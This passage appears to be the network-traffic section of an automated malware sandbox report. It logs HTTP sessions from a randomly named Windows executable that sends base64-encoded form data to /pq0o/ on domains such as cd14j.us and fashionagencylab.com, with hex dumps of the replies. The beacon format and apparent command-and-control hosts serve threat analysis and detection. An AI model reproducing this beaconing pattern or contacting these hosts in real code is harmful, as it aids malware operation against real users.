6a 46 4e 32 56 42 51 5a 73 57 65 37 75 67 30 4d 6a 70 39 37 62 32 5a 44 33 49 33 50 4a 47 48 6d 74 72 56 31 62 70 53 37 6d 44 64 63 70 74 66 2b 37 74 6f 32 30 6b 74 58 50 38 74 2b 67 74 49 71 58 5a 71 53 75 6a 54 51 39 44 75 76 34 54 5a 73 64 73 71 69 36 48 68 2b 4c 34 70 4f 65 74 38 41 6c 74 38 32 31 4c 4e 6a 30 71 7a 31 44 56 61 56 38 45 33 70 7a 33 31 71 6f 57 4a 38 76 77 76 79 75 73 67 72 32 43 4e 79 4b 41 46 6f 51 54 49 35 50 38 68 48 59 33 56 62 55 39 30 77 4c 32 37 53 34 78 44 6a 55 45 78 76 74 6b 73 74 73 33 61 62 55 70 6c 32 4f 56 6a 2f 69 75 4e 4a 76 61 38 78 33 4a 74 64 36 4d 73 58 6d 48 43 41 33 72 4b 69 68 68 76 71 5a 57 44 4c 69 35 2b 44 46 30 64 2b 43 32 70 47 4a 63 32 78 66 5a 55 4d 6f 47 70 4f 4c 4a 69 48 52 63 30 31 6c 6c 53 76 4a 52 4f 47 69 78 68 6c 44 41 61 55 36 42 53 65 71 77 61 53 6c 56 46 42 4f 77 30 79 49 4d 6c 32 39 31 65 74 45 51 49 59 4a 2b 39 6d 53 6d 43 4e 39 48 53 4c 33 47 70 51 53 4e 58 39 70 61 51 56 2f 5a 6b 37 62 76 47 71 73 55 6f 4b 65 67 7a 68 76 6e 76 45 32 74 42 70 59 57 39 2f 6f 77 75 70 58 48 6a 36 2b 75 47 51 36 54 64 4c 7a 52 49 47 4a 57 6e 32 53 35 4f 48 55 41 43 2b 53 32 42 57 65 76 54 34 38 32 71 7a 49 45 2b 4f 4c 6b 72 66 39 30 53 38 54 77 59 6d 4e 39 62 49 57 32 72 31 4c 4c 61 6c 6d 51 6d 47 51 47 61 44 71 57 52 76 67 49 42 50 4e 6c 4c 67 7a 63 31 51 38 35 75 59 41 35 65 55 72 38 46 54 4e 71 64 4f 79 76 36 7a 53 33 65 6d 4e 4b 44 79 74 43 38 4d 4e 6d 48 53 6f 57 42 67 43 78 31 37 72 68 42 38 50 6b 4f 63 42 55 44 6d 56 55 72 34 43 4e 41 76 61 65 43 48 46 44 74 79 51 30 6d 59 4b 43 42 39 61 66 62 75 31 61 4e 50 68 72 54 48 78 48 56 32 78 31 51 4a 71 75 4d 79 48 52 35 6e 66 45 51 30 59 2f 35 72 61 56 6f 5a 59 54 36 39 66 4b 56 47 45 4c 42 45 49 45 76 65 2f 44 46 33 62 7a 4d 55 74 59 36 58 56 72 4b 4d 4a 77 51 70 41 5a 4a 43 68 63 5a 66 54 76 56 4e 69 76 53 66 75 43 6c 69 4b 69 55 39 4c 2b 4a 58 4d 76 2b 7a 31 4c 46 72 2f 66 55 49 56 77 39 4d 32 54 61 69 67 75 51 3d 3d Data Ascii: sHlxgpX=+fghJfJWtdSXuSZwzv1QI8ZAY6rPo+ThzqGFWQdpd0aEep348WlpThXj3tKSysTFtGj7y2G9xCcq7Xm2lXV9dG8ug5Vl8Y1cIeSDVUPFinPLS2o0FFZkrVD+T3CPuLlJC2J4Etmbu4Sr6CEMcfwyhFQh48wu5wbwyuTJm7plBqfnboOScFbX6h9zEkZLBVZvdEKHIRhOguLznG0fdhUfGmkCwLlZY57pwb7H2fdw0TSWGIw4v6Z3zEGBbNBktPNWpZ4sK8h7BNXRKfFw6+MeBANy2D+LywuhnINhHQ9ubm0+4IDqkZ+8iHUdluTSyLCvqizTvadXpoU0yWEVgGp+DVFm9BjT2G7sCZMP6emkLMdlu3zpc++4oD4osDuCyHzgI2hIBehvOfm16cGPcUSlTNvEURZfJ8Yi4SS4lnt2ri8OcaigeLS2M9zL697LlU5wxDB/gx90LGC2OP0wylPbm7wm8Wqcxd7P0ooLIULje2JOA8zsQLtyNQry6i3Zh/jkRuL6+nzTYxqBG2pHsw/fAecs8pvq3cUTqrUuWCTCW2EBXfPWn58d59N1wKiyKZdCCfLBXs8GZJujFN2VBQZsWe7ug0Mjp97b2ZD3I3PJGHmtrV1bpS7mDdcptf+7to20ktXP8t+gtIqXZqSujTQ9Duv4TZsdsqi6Hh+L4pOet8Alt821LNj0qz1DVaV8E3pz31qoWJ8vwvyusgr2CNyKAFoQTI5P8hHY3VbU90wL27S4xDjUExvtksts3abUpl2OVj/iuNJva8x3Jtd6MsXmHCA3rKihhvqZWDLi5+DF0d+C2pGJc2xfZUMoGpOLJiHRc01llSvJROGixhlDAaU6BSeqwaSlVFBOw0yIMl291etEQIYJ+9mSmCN9HSL3GpQSNX9paQV/Zk7bvGqsUoKegzhvnvE2tBpYW9/owupXHj6+uGQ6TdLzRIGJWn2S5OHUAC+S2BWevT482qzIE+OLkrf90S8TwYmN9bIW2r1LLalmQmGQGaDqWRvgIBPNlLgzc1Q85uYA5eUr8FTNqdOyv6zS3emNKDytC8MNmHSoWBgCx17rhB8PkOcBUDmVUr4CNAvaeCHFDtyQ0mYKCB9afbu1aNPhrTHxHV2x1QJquMyHR5nfEQ0Y/5raVoZYT69fKVGELBEIEve/DF3bzMUtY6XVrKMJwQpAZJChcZfTvVNivSfuCliKiU9L+JXMv+z1LFr/fUIVw9M2TaiguQ==
Apr 23, 2024 08:39:09.727941990 CEST	701	IN	HTTP/1.1 405 Not Allowed date: Tue, 23 Apr 2024 06:39:09 GMT content-type: text/html content-length: 556 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49728	91.195.240.123	80	6976	C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 08:39:12.263885021 CEST	362	OUT	GET /pq0o/?Lx=8PqlJ028VT_&sHlxgpX=zdIBKqN9oP3plxVX8thCZZdmDrHBie+/57+iRklTGjPKULzejm8MTR3zmbqN1d/mp0y1+1mzyQU/+H24oE5uBlYVorRh6rpQbOSJYQm+mXyPaQohcHNhiXaWLX+2tNk6Xw== HTTP/1.1 Host: www.cd14j.us Accept: / Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com
Apr 23, 2024 08:39:12.810312986 CEST	1289	IN	HTTP/1.1 200 OK date: Tue, 23 Apr 2024 06:39:12 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding x-powered-by: PHP/8.1.17 expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_q7Y60Zgqc7DMNzWSzbaQI34pqUpIF8rraOryZazfnYS8OxAmDWxFUVbYLajN3WKrNTPvBL4Wpwepi/O64lu/Zg== last-modified: Tue, 23 Apr 2024 06:39:12 GMT x-cache-miss-from: parking-55fd589654-j5pqn server: NginX connection: close Data Raw: 32 43 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 71 37 59 36 30 5a 67 71 63 37 44 4d 4e 7a 57 53 7a 62 61 51 49 33 34 70 71 55 70 49 46 38 72 72 61 4f 72 79 5a 61 7a 66 6e 59 53 38 4f 78 41 6d 44 57 78 46 55 56 62 59 4c 61 6a 4e 33 57 4b 72 4e 54 50 76 42 4c 34 57 70 77 65 70 69 2f 4f 36 34 6c 75 2f 5a 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 63 64 31 34 6a 2e 75 73 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 63 64 31 34 6a 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 63 64 31 34 6a 2e 75 73 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_q7Y60Zgqc7DMNzWSzbaQI34pqUpIF8rraOryZazfnYS8OxAmDWxFUVbYLajN3WKrNTPvBL4Wpwepi/O64lu/Zg==><head><meta charset="utf-8"><title>cd14j.us - cd14j Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="cd14j.us is your first and best source for all of the information youre looking for. From general topics to more
Apr 23, 2024 08:39:12.810364008 CEST	1289	IN	Data Raw: 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 63 64 31 34 6a 2e 75 73 20 68 61 73 20 69 74 20 61 6c 6c 2e 20 57 65 20 68 6f 70 65 20 79 6f 75 20 66 69 6e 64 20 77 68 61 74 20 Data Ascii: of what you would expect to find here, cd14j.us has it all. We hope you find what you are searching for576!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.png"/><style>
Apr 23, 2024 08:39:12.810401917 CEST	1289	IN	Data Raw: 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 6d 61 72 67 69 6e 3a 30 7d 62 75 74 74 6f 6e 2c 69 Data Ascii: ,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-appearance:button}bu576tton::-moz-focus-
Apr 23, 2024 08:39:12.810437918 CEST	1289	IN	Data Raw: 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 61 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 63 Data Ascii: enter;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}.container-buybox__content-bu
Apr 23, 2024 08:39:12.810473919 CEST	1289	IN	Data Raw: 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 61 63 74 2d 75 73 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 Data Ascii: int__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{font-size:10px;color:#949494}.co
Apr 23, 2024 08:39:12.810508966 CEST	1289	IN	Data Raw: 73 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 68 65 61 64 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 25 3b 6d 61 72 67 69 6e 3a 30 20 30 Data Ascii: s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline-block;max-width:550px}.cookie-modal-window__co
Apr 23, 2024 08:39:12.810547113 CEST	1289	IN	Data Raw: 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f Data Ascii: ium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:initial}.switch input{opacity:0;width:0;height:0}.swi
Apr 23, 2024 08:39:12.810581923 CEST	1289	IN	Data Raw: 6e 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 2d 72 65 6c 61 74 65 64 6c 69 6e 6b 73 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 2d 61 64 73 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 Data Ascii: ntent__container-relatedlinks,.container-content__container-ads,.container-content__webarchive{width:30%;display:inline-block}.container-content__container-relatedlinks{margin-top:47px;flex-grow:1;width:60px}.container-content__container-ads{m
Apr 23, 2024 08:39:12.810617924 CEST	1289	IN	Data Raw: 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 69 6d 61 67 65 7b 63 6f 6e 74 65 6e 74 3a 75 72 6c 28 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f Data Ascii: wo-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images/bullet_justads.gif");float:left;padding-top:32px}.two-tier-ads-list__list-element-content{display:inline-block}.two-tier-ads-list__list-element-header-lin
Apr 23, 2024 08:39:12.810653925 CEST	999	IN	Data Raw: 69 6e 6b 3a 66 6f 63 75 73 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 7d 2e 64 6f 6d 61 69 6e 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 32 65 6d 3b 66 6f 6e 74 2d Data Ascii: ink:focus{text-decoration:underline}body{margin:0}.domain h1{font-size:2.2em;font-weight:normal;text-decoration:none;text-transform:lowercase;color:#949494}#container-domain{display:block;text-align:center}.name-silo-container{max-width:1028px
Apr 23, 2024 08:39:12.985510111 CEST	1289	IN	Data Raw: 35 37 36 0d 0a 64 62 6c 6f 63 6b 6b 65 79 22 3a 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 Data Ascii: 576dblockkey":" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_q7Y60Zgqc7DMNzWSzbaQI34pqUpIF8rraOryZazfnYS8OxAmDWxFUVbYLajN3WKrNTPvBL4Wpwepi/O6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49729	91.195.240.117	80	6976	C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 08:39:18.446669102 CEST	644	OUT	POST /pq0o/ HTTP/1.1 Host: www.fashionagencylab.com Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.fashionagencylab.com Content-Length: 208 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.fashionagencylab.com/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 73 48 6c 78 67 70 58 3d 4a 66 58 6b 49 68 31 70 2b 77 43 73 4a 55 65 41 6b 58 37 56 79 6f 49 7a 50 6b 62 33 71 2b 45 67 6c 6a 70 45 43 45 49 50 66 6e 58 59 64 4e 59 71 72 65 54 47 77 7a 41 43 34 68 39 4e 70 65 6d 4e 57 41 49 79 2f 49 2b 64 68 44 69 5a 41 4b 53 77 4d 34 64 58 77 6e 44 56 6d 65 6c 6f 61 55 34 31 78 2b 2b 63 4c 30 4d 6e 4d 33 6e 70 58 49 2b 73 6d 61 54 38 54 71 34 2b 38 30 68 36 49 42 78 62 57 71 66 6b 75 4b 4d 65 6d 53 6c 35 68 76 31 70 4e 71 2b 59 64 75 54 6e 79 52 74 48 78 4d 67 7a 47 41 54 59 6b 73 6e 6e 39 6e 35 31 50 55 79 4a 67 4a 66 4a 4f 53 64 45 4a 56 43 44 76 7a 46 47 71 50 67 2b 41 57 41 3d Data Ascii: sHlxgpX=JfXkIh1p+wCsJUeAkX7VyoIzPkb3q+EgljpECEIPfnXYdNYqreTGwzAC4h9NpemNWAIy/I+dhDiZAKSwM4dXwnDVmeloaU41x++cL0MnM3npXI+smaT8Tq4+80h6IBxbWqfkuKMemSl5hv1pNq+YduTnyRtHxMgzGATYksnn9n51PUyJgJfJOSdEJVCDvzFGqPg+AWA=
Apr 23, 2024 08:39:18.622351885 CEST	701	IN	HTTP/1.1 405 Not Allowed date: Tue, 23 Apr 2024 06:39:18 GMT content-type: text/html content-length: 556 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49730	91.195.240.117	80	6976	C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 08:39:21.148345947 CEST	664	OUT	POST /pq0o/ HTTP/1.1 Host: www.fashionagencylab.com Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.fashionagencylab.com Content-Length: 228 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.fashionagencylab.com/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 73 48 6c 78 67 70 58 3d 4a 66 58 6b 49 68 31 70 2b 77 43 73 59 45 4f 41 30 41 76 56 30 49 49 30 4b 6b 62 33 68 65 46 49 6c 6a 6c 45 43 47 6b 66 66 54 37 59 64 6f 6b 71 71 66 54 47 33 7a 41 43 33 42 39 4d 6e 2b 6d 47 57 41 45 51 2f 49 43 64 68 46 4f 5a 41 50 57 77 4c 4c 46 57 78 33 44 41 70 2b 6c 71 56 30 34 31 78 2b 2b 63 4c 31 6f 4e 4d 33 2f 70 58 35 4f 73 6e 34 37 39 4d 61 34 78 73 6b 68 36 43 68 78 66 57 71 66 47 75 50 74 4c 6d 51 64 35 68 71 52 70 4d 37 2b 62 53 75 54 62 73 52 73 58 30 75 56 2b 43 79 50 69 67 76 65 54 74 47 6c 59 48 43 66 6a 36 72 58 68 64 79 78 38 5a 47 4b 30 2b 44 6b 76 77 73 77 4f 65 42 55 41 4f 71 6b 36 49 37 55 74 63 63 56 73 69 6d 56 6c 68 42 39 74 Data Ascii: sHlxgpX=JfXkIh1p+wCsYEOA0AvV0II0Kkb3heFIljlECGkffT7YdokqqfTG3zAC3B9Mn+mGWAEQ/ICdhFOZAPWwLLFWx3DAp+lqV041x++cL1oNM3/pX5Osn479Ma4xskh6ChxfWqfGuPtLmQd5hqRpM7+bSuTbsRsX0uV+CyPigveTtGlYHCfj6rXhdyx8ZGK0+DkvwswOeBUAOqk6I7UtccVsimVlhB9t
Apr 23, 2024 08:39:21.324069023 CEST	701	IN	HTTP/1.1 405 Not Allowed date: Tue, 23 Apr 2024 06:39:21 GMT content-type: text/html content-length: 556 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 